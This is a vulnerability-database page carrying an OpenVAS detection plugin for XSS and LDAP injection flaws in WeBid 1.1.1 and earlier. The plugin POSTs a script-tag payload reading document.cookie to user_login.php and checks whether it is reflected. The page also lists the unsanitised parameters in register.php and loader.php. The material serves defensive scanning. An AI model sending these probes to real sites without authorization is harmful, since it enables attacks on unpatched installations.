WeBid <= 1.1.1 Multiple XSS and LDAP Injection Vulnerabilities
🗓️ 29 Jul 2014 00:00:00Reported by Copyright (C) 2014 Greenbone AGType
openvas🔗 plugins.openvas.org👁 25 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2014-5101 | 10 Jul 201400:00 | – | circl | |
| CVE-2014-5101 | 25 Jul 201419:00 | – | cve | |
| CVE-2014-5114 | 29 Jul 201414:00 | – | cve | |
| CVE-2014-5101 | 25 Jul 201419:00 | – | cvelist | |
| CVE-2014-5114 | 29 Jul 201414:00 | – | cvelist | |
| WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities | 10 Jul 201400:00 | – | exploitdb | |
| EUVD-2014-4999 | 7 Oct 202500:30 | – | euvd | |
| EUVD-2014-5012 | 7 Oct 202500:30 | – | euvd | |
| CVE-2014-5101 | 25 Jul 201419:55 | – | nvd | |
| CVE-2014-5114 | 29 Jul 201414:55 | – | nvd |
10
| Source | Link |
|---|---|
| packetstormsecurity | www.packetstormsecurity.com/files/127431 |
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:webidsupport:webid";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.804476");
script_version("2025-01-31T05:37:27+0000");
script_cve_id("CVE-2014-5101", "CVE-2014-5114");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2025-01-31 05:37:27 +0000 (Fri, 31 Jan 2025)");
script_tag(name:"creation_date", value:"2014-07-29 12:53:33 +0530 (Tue, 29 Jul 2014)");
script_name("WeBid <= 1.1.1 Multiple XSS and LDAP Injection Vulnerabilities");
script_tag(name:"summary", value:"WeBid is prone to multiple cross-site scripting (XSS) and LDAP
injection vulnerabilities.");
script_tag(name:"vuldetect", value:"Send a crafted data via HTTP POST request and check whether it
is able to read cookie or not.");
script_tag(name:"insight", value:"Mulltiple flaws are due to:
- The /WeBid/user_login.php script does not validate input to the 'username'
POST parameter before returning it to users.
- The register.php script does not validate input to the 'TPL_name', 'TPL_nick',
' TPL_email', 'TPL_year', 'TPL_address', 'TPL_city', 'TPL_prov', 'TPL_zip',
'TPL_phone', 'TPL_pp_email', 'TPL_authnet_id', 'TPL_authnet_pass',
'TPL_wordpay_id', 'TPL_toocheckout_id', and 'TPL_moneybookers_email' POST
parameters before returning it to users.
- An input passed via the 'js' parameter is not properly sanitized upon
submission to the loader.php script.");
script_tag(name:"impact", value:"Successful exploitation will allow attacker to execute arbitrary
HTML and script code in a user's browser session in the context of an affected site.");
script_tag(name:"affected", value:"WeBid version 1.1.1 and probably prior.");
script_tag(name:"solution", value:"No known solution was made available for at least one year
since the disclosure of this vulnerability. Likely none will be provided anymore. General solution
options are to upgrade to a newer release, disable respective features, remove the product or
replace the product by another one.");
script_tag(name:"solution_type", value:"WillNotFix");
script_xref(name:"URL", value:"http://packetstormsecurity.com/files/127431");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_analysis");
script_copyright("Copyright (C) 2014 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_webid_detect.nasl");
script_mandatory_keys("webid/installed");
script_require_ports("Services/www", 80);
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
if(!port = get_app_port(cpe:CPE))
exit(0);
if(!dir = get_app_location(cpe:CPE, port:port))
exit(0);
if(dir == "/")
dir = "";
host = http_host_name(port:port);
postData = 'username="><script>alert(document.cookie);</script>' +
'&password=&input=Login&action=login';
url = dir + "/user_login.php";
req = string("POST ", url, " HTTP/1.1\r\n",
"Host: ", host, "\r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Content-Length: ", strlen(postData), "\r\n",
"\r\n", postData);
res = http_keepalive_send_recv(port:port, data:req);
if(res =~ "^HTTP/1\.[01] 200" && res =~ '"><script>alert\\(document.cookie\\);</.*script>"' && ">WeBid<" >< res) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Jan 2025 00:00Current
6Medium risk
Vulners AI Score6
CVSS 27.5
EPSS0.02503